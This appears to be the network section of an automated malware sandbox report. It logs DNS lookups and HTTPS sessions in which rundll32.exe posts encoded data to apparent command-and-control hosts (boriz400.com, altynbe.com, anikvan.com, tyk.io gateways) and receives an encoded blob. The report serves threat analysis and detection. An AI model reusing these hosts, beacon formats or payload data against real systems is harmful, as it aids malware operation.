                                                                                                                    May 11, 2024 00:04:14.159241915 CEST1.1.1.1192.168.2.40x3148No error (0)altynbe.com138.124.183.215A (IP address)IN (0x0001)false
                                                                                                                    May 11, 2024 00:04:18.799472094 CEST1.1.1.1192.168.2.40xaee4No error (0)ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.iopub-ingress-aws-use1.cloud-ara.tyk.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                    May 11, 2024 00:04:18.799472094 CEST1.1.1.1192.168.2.40xaee4No error (0)pub-ingress-aws-use1.cloud-ara.tyk.ioae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                    May 11, 2024 00:04:18.799472094 CEST1.1.1.1192.168.2.40xaee4No error (0)ae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.com54.175.181.104A (IP address)IN (0x0001)false
                                                                                                                    May 11, 2024 00:04:18.799472094 CEST1.1.1.1192.168.2.40xaee4No error (0)ae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.com35.172.8.165A (IP address)IN (0x0001)false
                                                                                                                    May 11, 2024 00:04:18.799472094 CEST1.1.1.1192.168.2.40xaee4No error (0)ae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.com54.159.36.188A (IP address)IN (0x0001)false
                                                                                                                    May 11, 2024 00:04:19.711488962 CEST1.1.1.1192.168.2.40x69b6No error (0)anikvan.com95.164.68.73A (IP address)IN (0x0001)false
                                                                                                                    May 11, 2024 00:04:35.619683981 CEST1.1.1.1192.168.2.40x5f9fNo error (0)uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.iopub-ingress-aws-euc1.cloud-ara.tyk.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                    May 11, 2024 00:04:35.619683981 CEST1.1.1.1192.168.2.40x5f9fNo error (0)pub-ingress-aws-euc1.cloud-ara.tyk.ioae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                    May 11, 2024 00:04:35.619683981 CEST1.1.1.1192.168.2.40x5f9fNo error (0)ae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.com3.69.236.35A (IP address)IN (0x0001)false
                                                                                                                    May 11, 2024 00:04:35.619683981 CEST1.1.1.1192.168.2.40x5f9fNo error (0)ae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.com3.72.42.242A (IP address)IN (0x0001)false
                                                                                                                    May 11, 2024 00:04:35.619683981 CEST1.1.1.1192.168.2.40x5f9fNo error (0)ae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.com35.157.36.116A (IP address)IN (0x0001)false
                                                                                                                    May 11, 2024 00:05:43.138046026 CEST1.1.1.1192.168.2.40xc6d8No error (0)workspacin.cloud104.21.16.155A (IP address)IN (0x0001)false
                                                                                                                    May 11, 2024 00:05:43.138046026 CEST1.1.1.1192.168.2.40xc6d8No error (0)workspacin.cloud172.67.213.171A (IP address)IN (0x0001)false
                                                                                                                    May 11, 2024 00:06:01.079061031 CEST1.1.1.1192.168.2.40xc19bNo error (0)uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.iopub-ingress-aws-euc1.cloud-ara.tyk.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                    May 11, 2024 00:06:01.079061031 CEST1.1.1.1192.168.2.40xc19bNo error (0)pub-ingress-aws-euc1.cloud-ara.tyk.ioae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                    May 11, 2024 00:06:01.079061031 CEST1.1.1.1192.168.2.40xc19bNo error (0)ae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.com3.69.236.35A (IP address)IN (0x0001)false
                                                                                                                    May 11, 2024 00:06:01.079061031 CEST1.1.1.1192.168.2.40xc19bNo error (0)ae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.com35.157.36.116A (IP address)IN (0x0001)false
                                                                                                                    May 11, 2024 00:06:01.079061031 CEST1.1.1.1192.168.2.40xc19bNo error (0)ae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.com3.72.42.242A (IP address)IN (0x0001)false
                                                                                                                    May 11, 2024 00:06:08.864455938 CEST1.1.1.1192.168.2.40x7f64No error (0)ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.iopub-ingress-aws-use1.cloud-ara.tyk.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                    May 11, 2024 00:06:08.864455938 CEST1.1.1.1192.168.2.40x7f64No error (0)pub-ingress-aws-use1.cloud-ara.tyk.ioae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                    May 11, 2024 00:06:08.864455938 CEST1.1.1.1192.168.2.40x7f64No error (0)ae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.com54.175.181.104A (IP address)IN (0x0001)false
                                                                                                                    May 11, 2024 00:06:08.864455938 CEST1.1.1.1192.168.2.40x7f64No error (0)ae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.com54.159.36.188A (IP address)IN (0x0001)false
                                                                                                                    May 11, 2024 00:06:08.864455938 CEST1.1.1.1192.168.2.40x7f64No error (0)ae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.com35.172.8.165A (IP address)IN (0x0001)false

                                                                                                                    HTTP Request Dependency Graph

                                                                                                                    • boriz400.com
                                                                                                                    • altynbe.com
                                                                                                                    • ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io
                                                                                                                    • anikvan.com
                                                                                                                    • uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io
                                                                                                                    • workspacin.cloud

                                                                                                                    HTTPS Proxied Packets

                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    0192.168.2.44974591.194.11.1834437320C:\Windows\System32\rundll32.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-05-10 22:04:13 UTC246OUTPOST /api/azure HTTP/1.1
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
                                                                                                                    Host: boriz400.com
                                                                                                                    Content-Length: 538
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-05-10 22:04:13 UTC538OUTData Raw: 33 39 33 62 30 33 64 66 65 30 37 37 32 64 31 64 35 63 62 64 64 31 38 33 63 39 37 66 37 63 65 36 38 36 63 30 38 39 34 35 39 34 30 63 33 63 31 63 64 63 38 39 36 34 63 37 66 64 61 64 30 63 66 64 38 36 30 31 39 35 37 62 36 39 61 36 35 32 32 32 36 31 36 66 64 31 36 36 38 30 38 61 31 38 39 33 30 65 36 64 36 30 61 65 35 38 32 62 63 33 30 64 35 64 65 34 65 37 63 65 30 30 38 37 35 35 37 39 35 32 30 66 62 35 39 35 30 62 38 37 32 63 32 66 37 62 61 39 63 39 33 30 65 62 64 35 37 37 33 37 31 66 30 30 33 61 38 30 64 39 39 61 36 64 37 39 34 39 32 63 64 37 38 66 61 35 64 38 39 63 63 65 39 34 38 38 33 36 63 32 63 65 32 32 35 33 32 66 39 34 66 31 63 30 36 33 32 32 36 62 32 61 39 61 35 65 32 32 65 34 34 32 61 65 34 37 62 33 34 63 66 66 32 38 33 38 37 31 33 31 38 34 38 62 34
                                                                                                                    Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce686c08945940c3c1cdc8964c7fdad0cfd8601957b69a65222616fd166808a18930e6d60ae582bc30d5de4e7ce00875579520fb5950b872c2f7ba9c930ebd577371f003a80d99a6d79492cd78fa5d89cce948836c2ce22532f94f1c063226b2a9a5e22e442ae47b34cff28387131848b4
                                                                                                                    2024-05-10 22:04:13 UTC151INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 52
                                                                                                                    Connection: close
                                                                                                                    Date: Fri, 10 May 2024 22:04:13 GMT
                                                                                                                    2024-05-10 22:04:13 UTC52INData Raw: 49 44 52 54 67 38 38 4a 58 69 41 2f 6c 5a 65 2b 38 68 55 48 39 2f 57 34 36 56 54 75 41 7a 6f 48 73 50 30 41 6f 4f 66 59 44 49 48 69 53 6f 6b 63 4d 2b 51 3d
                                                                                                                    Data Ascii: IDRTg88JXiA/lZe+8hUH9/W46VTuAzoHsP0AoOfYDIHiSokcM+Q=


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    1192.168.2.449750138.124.183.2154437320C:\Windows\System32\rundll32.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-05-10 22:04:14 UTC247OUTPOST /content.php HTTP/1.1
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
                                                                                                                    Host: altynbe.com
                                                                                                                    Content-Length: 154
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-05-10 22:04:14 UTC154OUTData Raw: 33 39 33 62 30 33 64 66 65 30 37 37 32 64 31 64 35 63 62 64 64 31 38 33 63 39 37 66 37 63 65 36 64 32 61 37 38 62 33 39 66 39 31 64 34 31 30 61 61 34 38 31 36 32 62 39 65 34 61 32 30 65 66 63 65 31 34 65 65 38 30 63 34 66 39 30 30 34 31 64 31 36 36 30 66 62 31 34 62 38 65 37 33 35 62 63 32 35 33 65 37 32 64 31 34 64 32 63 64 33 34 34 34 35 66 36 62 35 39 38 30 65 39 66 35 39 32 64 35 34 31 35 66 63 63 36 34 37 64 64 32 30 33 39 37 36 65 35 38 34 31 33 64 31
                                                                                                                    Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
                                                                                                                    2024-05-10 22:04:15 UTC159INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Date: Fri, 10 May 2024 22:04:15 GMT
                                                                                                                    2024-05-10 22:04:15 UTC4022INData Raw: 66 61 66 0d 0a 44 33 49 4c 33 4d 70 6e 4c 67 73 6b 73 66 4b 62 36 42 67 4d 72 4f 72 4e 33 47 33 47 4b 6c 6f 38 68 76 73 54 6d 4e 4f 74 41 61 44 74 4f 66 4d 78 58 70 56 53 4f 69 41 2b 2b 44 53 4c 35 6a 53 61 42 30 38 4d 2b 79 78 6a 73 33 6f 77 67 34 4f 43 64 76 31 6f 57 31 4d 31 33 64 78 7a 71 43 35 38 42 66 57 2f 64 59 48 46 44 57 77 67 51 6c 62 41 6d 65 77 43 50 69 35 59 71 39 2f 52 72 64 61 57 31 63 38 6c 7a 39 34 57 64 58 72 4c 67 50 6f 57 54 78 35 55 31 6d 59 57 79 69 37 4f 4d 72 4d 50 6c 55 52 63 4e 45 7a 4c 76 58 74 71 68 70 61 47 69 6b 6d 74 41 77 57 59 67 34 43 33 35 48 53 41 61 4b 55 51 46 38 43 4c 52 45 75 51 30 72 70 77 47 30 67 37 4b 30 46 61 57 45 2f 46 34 34 36 39 2f 4b 45 6e 50 35 66 58 4c 4f 5a 75 44 53 6e 68 78 79 69 77 4a 34 73 70 62 64
                                                                                                                    Data Ascii: fafD3IL3MpnLgsksfKb6BgMrOrN3G3GKlo8hvsTmNOtAaDtOfMxXpVSOiA++DSL5jSaB08M+yxjs3owg4OCdv1oW1M13dxzqC58BfW/dYHFDWwgQlbAmewCPi5Yq9/RrdaW1c8lz94WdXrLgPoWTx5U1mYWyi7OMrMPlURcNEzLvXtqhpaGikmtAwWYg4C35HSAaKUQF8CLREuQ0rpwG0g7K0FaWE/F4469/KEnP5fXLOZuDSnhxyiwJ4spbd
                                                                                                                    2024-05-10 22:04:15 UTC4104INData Raw: 31 30 30 30 0d 0a 4f 6e 32 49 32 75 49 56 63 51 4b 4c 6c 56 52 74 76 64 59 51 46 6a 68 74 42 38 4f 32 58 6d 63 57 6f 31 58 6b 6e 58 76 4e 6c 45 63 37 61 70 50 52 74 4a 65 66 62 5a 7a 4c 66 61 37 71 63 62 64 36 50 33 39 62 32 4c 46 53 34 62 47 6a 63 4b 6b 48 6c 48 31 32 49 6d 4e 43 52 33 33 44 4a 4d 68 52 68 65 79 75 53 58 42 51 61 5a 39 6b 55 41 31 33 68 33 31 42 58 2f 49 54 68 6e 53 4d 66 6c 6f 41 44 47 64 54 4a 69 33 58 4c 7a 43 33 5a 6e 4c 61 53 43 36 56 2b 51 67 35 4a 72 42 38 77 33 65 39 6b 68 77 4b 7a 6d 46 6a 73 72 6d 59 56 48 72 34 4c 41 49 62 62 42 4a 4c 6d 37 52 33 37 61 5a 65 53 7a 4c 4f 6b 45 30 36 62 5a 2b 74 67 52 37 55 72 33 73 43 55 6d 67 73 51 48 51 54 59 4d 59 4b 47 6d 43 71 2b 73 5a 65 48 44 56 51 64 6b 65 63 32 39 56 4e 7a 65 70 69 42
                                                                                                                    Data Ascii: 1000On2I2uIVcQKLlVRtvdYQFjhtB8O2XmcWo1XknXvNlEc7apPRtJefbZzLfa7qcbd6P39b2LFS4bGjcKkHlH12ImNCR33DJMhRheyuSXBQaZ9kUA13h31BX/IThnSMfloADGdTJi3XLzC3ZnLaSC6V+Qg5JrB8w3e9khwKzmFjsrmYVHr4LAIbbBJLm7R37aZeSzLOkE06bZ+tgR7Ur3sCUmgsQHQTYMYKGmCq+sZeHDVQdkec29VNzepiB
                                                                                                                    2024-05-10 22:04:15 UTC627INData Raw: 32 36 63 0d 0a 50 36 57 48 67 38 75 64 49 4d 4c 78 6e 77 48 49 64 75 56 36 73 48 52 52 37 77 72 42 31 33 75 54 41 66 2b 52 63 73 6f 41 52 4b 41 59 65 32 4e 41 4c 71 47 56 54 46 32 63 67 41 65 74 6c 6d 4d 75 76 30 75 52 47 47 52 44 39 68 55 31 46 4d 59 53 52 4a 2b 67 33 39 68 34 41 6e 39 68 71 55 55 6f 57 41 32 69 36 46 63 72 4d 55 71 68 45 41 33 30 59 47 2f 59 62 51 37 74 51 68 2f 35 6c 4d 59 76 45 4b 46 6f 6e 66 30 4a 58 4a 2f 39 58 4d 69 4b 6f 72 48 66 32 38 4d 38 6c 36 55 70 76 54 64 61 71 31 68 4a 57 75 32 71 37 2f 4e 59 37 2f 70 6b 68 34 33 38 53 47 6e 36 71 78 32 63 6e 62 76 44 32 43 72 51 61 75 35 7a 35 69 33 58 6e 38 4f 63 48 41 48 79 6e 56 39 67 7a 34 5a 31 74 65 55 64 45 58 59 31 73 37 32 67 37 6e 6e 34 36 73 4d 61 6a 54 57 31 72 34 4b 36 62 73
                                                                                                                    Data Ascii: 26cP6WHg8udIMLxnwHIduV6sHRR7wrB13uTAf+RcsoARKAYe2NALqGVTF2cgAetlmMuv0uRGGRD9hU1FMYSRJ+g39h4An9hqUUoWA2i6FcrMUqhEA30YG/YbQ7tQh/5lMYvEKFonf0JXJ/9XMiKorHf28M8l6UpvTdaq1hJWu2q7/NY7/pkh438SGn6qx2cnbvD2CrQau5z5i3Xn8OcHAHynV9gz4Z1teUdEXY1s72g7nn46sMajTW1r4K6bs
                                                                                                                    2024-05-10 22:04:15 UTC4104INData Raw: 31 30 30 30 0d 0a 6c 44 4f 46 69 44 6c 79 45 66 71 63 74 68 66 63 46 52 33 34 4e 6a 76 72 75 5a 33 4d 66 44 71 31 4d 5a 66 53 4a 4d 32 55 70 7a 63 4d 30 67 55 69 52 50 46 47 6f 62 45 66 44 57 74 33 78 6b 2b 67 37 34 75 53 45 5a 66 6f 57 69 2f 50 34 6a 6f 70 6a 74 68 2f 43 2b 78 57 78 70 5a 69 55 32 4a 4a 66 4f 62 56 38 69 4d 70 36 2f 58 69 76 77 4e 33 71 63 72 38 46 72 53 43 6f 55 4d 75 67 4f 66 45 41 49 41 77 75 30 6f 61 54 49 62 34 35 42 50 63 4a 2f 48 6a 47 68 65 70 6e 6a 62 72 6e 57 70 55 37 7a 67 45 44 49 50 6f 55 53 31 4e 41 67 37 68 74 2b 64 66 61 42 66 6d 4c 75 62 36 50 79 4f 74 49 7a 66 66 31 49 75 57 30 66 64 34 43 34 57 71 70 57 73 4a 70 4f 64 52 49 44 38 4d 49 5a 52 35 6f 71 4e 54 39 79 51 6f 4b 30 41 6a 31 58 6e 64 74 76 55 71 33 32 5a 75 35
                                                                                                                    Data Ascii: 1000lDOFiDlyEfqcthfcFR34NjvruZ3MfDq1MZfSJM2UpzcM0gUiRPFGobEfDWt3xk+g74uSEZfoWi/P4jopjth/C+xWxpZiU2JJfObV8iMp6/XivwN3qcr8FrSCoUMugOfEAIAwu0oaTIb45BPcJ/HjGhepnjbrnWpU7zgEDIPoUS1NAg7ht+dfaBfmLub6PyOtIzff1IuW0fd4C4WqpWsJpOdRID8MIZR5oqNT9yQoK0Aj1XndtvUq32Zu5
                                                                                                                    2024-05-10 22:04:15 UTC4104INData Raw: 31 30 30 30 0d 0a 6e 2f 33 78 76 4e 4e 67 4f 55 4d 6f 6f 61 4d 6b 4d 50 37 2f 43 66 49 53 65 33 6f 69 56 69 64 67 55 2b 31 70 4b 68 38 2b 71 4f 74 4d 69 45 32 45 66 34 68 69 4b 4d 4e 79 62 30 47 37 65 61 70 50 77 59 71 69 36 2b 2f 30 6d 6c 77 53 4c 6b 2b 44 56 72 43 34 6b 72 74 33 47 50 47 54 49 30 44 4c 2f 4f 31 76 70 6d 4e 44 2b 56 54 68 6b 53 52 4a 4a 75 65 43 4d 38 59 62 49 57 6d 69 34 4d 62 53 4e 76 41 55 4f 46 61 70 4f 6f 48 4b 6f 62 71 62 58 4a 43 65 50 32 38 77 41 53 59 44 48 47 76 4a 56 63 4e 73 4b 46 4c 62 48 4e 6a 70 6e 77 59 35 7a 64 61 4d 68 63 45 69 77 51 51 45 4e 5a 42 35 56 31 53 54 6f 77 52 69 44 6c 44 4e 71 57 66 69 68 35 6b 41 66 51 61 67 68 4a 6f 5a 66 4d 59 39 2b 55 36 31 70 4b 59 57 30 2f 38 6c 31 39 4b 66 41 69 48 64 30 6c 64 52 78
                                                                                                                    Data Ascii: 1000n/3xvNNgOUMooaMkMP7/CfISe3oiVidgU+1pKh8+qOtMiE2Ef4hiKMNyb0G7eapPwYqi6+/0mlwSLk+DVrC4krt3GPGTI0DL/O1vpmND+VThkSRJJueCM8YbIWmi4MbSNvAUOFapOoHKobqbXJCeP28wASYDHGvJVcNsKFLbHNjpnwY5zdaMhcEiwQQENZB5V1STowRiDlDNqWfih5kAfQaghJoZfMY9+U61pKYW0/8l19KfAiHd0ldRx
                                                                                                                    2024-05-10 22:04:15 UTC4104INData Raw: 31 30 30 30 0d 0a 73 52 71 64 74 62 73 69 62 78 78 6c 37 34 31 64 46 52 71 33 41 46 69 47 35 45 4e 30 63 63 64 67 67 49 70 59 54 35 73 58 6d 69 73 34 41 39 6c 4d 47 79 55 66 41 4a 73 73 76 77 36 54 78 68 77 50 47 4a 63 47 49 47 41 66 36 74 5a 58 58 65 63 69 2f 4b 4d 6b 79 51 5a 7a 7a 50 4b 76 31 46 54 74 31 68 2b 50 49 66 4f 56 64 46 48 73 6a 34 6a 37 68 35 2f 53 51 35 42 69 37 46 4b 6f 37 72 6a 4a 58 4f 79 43 52 78 58 47 51 43 35 62 51 66 62 55 4f 75 6d 4c 65 6a 67 46 77 44 36 38 32 32 37 50 73 76 4a 31 45 71 53 61 61 67 68 4f 57 54 38 4e 58 61 53 45 46 78 4a 74 35 4b 54 50 63 44 73 47 59 6e 57 36 71 54 67 49 6c 2f 49 4b 68 69 41 76 6e 55 45 73 70 66 43 37 4f 2b 6b 71 44 57 39 34 50 58 66 33 6d 30 62 4d 79 65 2b 31 48 4e 6b 56 36 6a 4a 53 4c 67 6e 6a 49
                                                                                                                    Data Ascii: 1000sRqdtbsibxxl741dFRq3AFiG5EN0ccdggIpYT5sXmis4A9lMGyUfAJssvw6TxhwPGJcGIGAf6tZXXeci/KMkyQZzzPKv1FTt1h+PIfOVdFHsj4j7h5/SQ5Bi7FKo7rjJXOyCRxXGQC5bQfbUOumLejgFwD68227PsvJ1EqSaaghOWT8NXaSEFxJt5KTPcDsGYnW6qTgIl/IKhiAvnUEspfC7O+kqDW94PXf3m0bMye+1HNkV6jJSLgnjI
                                                                                                                    2024-05-10 22:04:15 UTC688INData Raw: 32 61 39 0d 0a 67 75 36 6e 63 57 30 46 72 6c 48 61 65 62 37 7a 6e 38 74 63 67 75 33 52 75 53 50 33 51 51 39 4b 38 6c 43 33 6b 59 44 48 4d 4d 33 62 39 61 39 79 48 69 6f 4b 33 72 4f 36 54 73 56 38 6e 4e 53 77 6b 47 4e 38 2b 6e 61 35 72 77 34 6d 64 69 5a 37 35 32 4f 66 39 75 32 74 51 59 57 4f 5a 6c 62 55 48 79 76 67 70 7a 77 4a 61 4f 39 63 30 76 50 32 37 61 4a 41 71 74 62 37 6f 6d 4f 41 4d 55 35 71 30 37 52 57 75 4b 78 67 65 4a 57 38 49 47 67 7a 58 63 65 39 71 4a 43 34 79 4a 33 64 76 48 6d 45 47 6a 43 4e 74 33 57 32 53 30 67 6e 72 32 6a 43 47 6d 46 62 74 6b 67 33 48 62 49 7a 50 44 32 38 77 6a 34 4d 57 57 5a 47 71 4d 35 35 4e 47 37 5a 36 32 57 70 6b 6b 2b 77 38 43 75 37 6c 4a 4c 71 36 73 45 54 48 71 44 45 33 47 42 65 69 48 75 54 76 4e 51 6e 50 64 44 31 45 6b
                                                                                                                    Data Ascii: 2a9gu6ncW0FrlHaeb7zn8tcgu3RuSP3QQ9K8lC3kYDHMM3b9a9yHioK3rO6TsV8nNSwkGN8+na5rw4mdiZ752Of9u2tQYWOZlbUHyvgpzwJaO9c0vP27aJAqtb7omOAMU5q07RWuKxgeJW8IGgzXce9qJC4yJ3dvHmEGjCNt3W2S0gnr2jCGmFbtkg3HbIzPD28wj4MWWZGqM55NG7Z62Wpkk+w8Cu7lJLq6sETHqDE3GBeiHuTvNQnPdD1Ek
                                                                                                                    2024-05-10 22:04:15 UTC4104INData Raw: 31 30 30 30 0d 0a 4d 41 6d 75 32 41 36 37 71 70 37 4e 76 74 75 30 71 2b 51 38 58 42 32 66 6e 6a 74 6f 74 49 2f 5a 69 7a 45 51 33 30 63 68 50 30 54 4d 69 6f 71 6e 76 32 35 64 78 4b 53 37 55 6a 71 6e 37 57 34 39 78 74 79 46 30 50 2b 51 37 6e 6e 6c 75 71 6b 38 50 5a 32 62 44 66 6c 79 5a 38 53 43 2b 38 73 4c 6e 37 2f 61 63 61 73 58 58 64 64 6f 64 4c 63 6c 2b 68 79 70 64 43 72 72 53 70 53 62 7a 58 59 44 4c 65 2f 67 64 74 42 6c 4f 45 73 2b 45 7a 49 65 6d 73 62 64 4b 66 33 38 79 4a 6b 34 6b 52 42 77 30 54 56 62 4e 43 64 78 38 54 38 69 69 53 32 69 74 4e 45 50 6a 74 63 78 69 70 49 72 38 4d 72 73 31 4e 47 55 45 2f 4d 52 6f 46 73 4b 63 51 6c 71 6d 56 42 7a 66 70 61 4b 7a 38 49 52 6d 57 6f 78 5a 6f 2f 2f 56 77 48 61 79 4d 43 70 52 71 53 77 75 53 35 67 48 41 49 67 78
                                                                                                                    Data Ascii: 1000MAmu2A67qp7Nvtu0q+Q8XB2fnjtotI/ZizEQ30chP0TMioqnv25dxKS7Ujqn7W49xtyF0P+Q7nnluqk8PZ2bDflyZ8SC+8sLn7/acasXXddodLcl+hypdCrrSpSbzXYDLe/gdtBlOEs+EzIemsbdKf38yJk4kRBw0TVbNCdx8T8iiS2itNEPjtcxipIr8Mrs1NGUE/MRoFsKcQlqmVBzfpaKz8IRmWoxZo//VwHayMCpRqSwuS5gHAIgx
                                                                                                                    2024-05-10 22:04:15 UTC4104INData Raw: 31 30 30 30 0d 0a 4d 4a 46 69 39 4a 4b 52 6b 67 74 55 2b 47 58 6f 69 37 34 6b 5a 47 6b 72 32 5a 54 4a 4e 2b 31 79 53 71 7a 38 4b 44 76 72 63 53 32 69 30 58 4f 49 71 69 33 74 36 45 62 61 2b 4d 32 49 51 36 69 47 57 68 4e 6d 39 4f 77 37 67 49 6e 69 67 2f 46 5a 4d 7a 57 56 43 74 45 41 45 37 6d 73 2f 73 67 53 6b 74 6d 46 50 6c 31 6b 42 31 4d 33 55 6e 73 35 4f 49 73 55 50 5a 73 79 63 6e 4e 73 48 7a 4b 70 4a 76 44 2f 74 4a 54 70 35 61 66 6b 61 6e 49 56 46 5a 4f 62 44 55 56 59 4a 48 46 65 72 36 34 58 5a 78 54 71 45 47 46 34 62 66 33 47 66 38 52 6e 53 51 59 6a 43 70 68 79 74 43 50 4f 58 78 4f 37 39 77 4a 73 57 41 7a 67 6c 79 6c 6e 6c 79 48 4d 4d 62 42 6b 38 66 38 5a 6e 45 59 7a 62 36 51 30 4f 47 75 75 79 4c 5a 4a 43 7a 46 59 6f 38 61 5a 47 75 46 30 32 51 78 53 4b
                                                                                                                    Data Ascii: 1000MJFi9JKRkgtU+GXoi74kZGkr2ZTJN+1ySqz8KDvrcS2i0XOIqi3t6Eba+M2IQ6iGWhNm9Ow7gInig/FZMzWVCtEAE7ms/sgSktmFPl1kB1M3Uns5OIsUPZsycnNsHzKpJvD/tJTp5afkanIVFZObDUVYJHFer64XZxTqEGF4bf3Gf8RnSQYjCphytCPOXxO79wJsWAzglylnlyHMMbBk8f8ZnEYzb6Q0OGuuyLZJCzFYo8aZGuF02QxSK


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    2192.168.2.44975354.175.181.1044437320C:\Windows\System32\rundll32.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-05-10 22:04:19 UTC284OUTPOST /api/azure HTTP/1.1
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
                                                                                                                    Host: ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io
                                                                                                                    Content-Length: 656
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-05-10 22:04:19 UTC656OUTData Raw: 33 39 33 62 30 33 64 66 65 30 37 37 32 64 31 64 35 63 62 64 64 31 38 33 63 39 37 66 37 63 65 36 64 32 61 37 38 62 33 39 66 39 31 64 34 31 30 61 61 34 38 31 36 32 62 39 65 34 61 32 30 65 66 63 65 31 34 65 65 38 30 63 34 66 39 30 30 34 31 64 31 36 36 30 66 62 31 34 62 38 65 37 33 35 62 63 32 35 33 65 37 32 64 31 34 64 32 63 64 33 34 34 34 35 66 36 62 35 39 38 30 65 39 66 35 39 32 64 35 34 31 35 66 63 63 36 34 37 64 64 32 30 33 39 30 35 63 39 62 38 32 63 39 61 62 32 30 61 35 34 33 38 33 31 35 39 66 31 62 61 65 66 31 35 30 61 32 65 35 63 61 30 38 34 63 61 61 65 65 37 62 62 66 39 66 35 35 35 64 61 66 64 30 30 30 36 33 30 38 32 38 32 65 39 31 34 32 34 30 38 34 33 65 39 37 64 30 30 63 31 32 31 64 66 32 34 63 36 33 30 38 65 35 35 34 63 31 32 32 65 65 37 62 66 34
                                                                                                                    Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203905c9b82c9ab20a54383159f1baef150a2e5ca084caaee7bbf9f555dafd0006308282e914240843e97d00c121df24c6308e554c122ee7bf4
                                                                                                                    2024-05-10 22:04:19 UTC253INHTTP/1.1 200 OK
                                                                                                                    Date: Fri, 10 May 2024 22:04:19 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 0
                                                                                                                    Connection: close
                                                                                                                    X-Ratelimit-Limit: 0
                                                                                                                    X-Ratelimit-Remaining: 0
                                                                                                                    X-Ratelimit-Reset: 0
                                                                                                                    Strict-Transport-Security: max-age=15724800; includeSubDomains


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    3192.168.2.44975495.164.68.734437320C:\Windows\System32\rundll32.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-05-10 22:04:20 UTC245OUTPOST /api/azure HTTP/1.1
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
                                                                                                                    Host: anikvan.com
                                                                                                                    Content-Length: 444
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
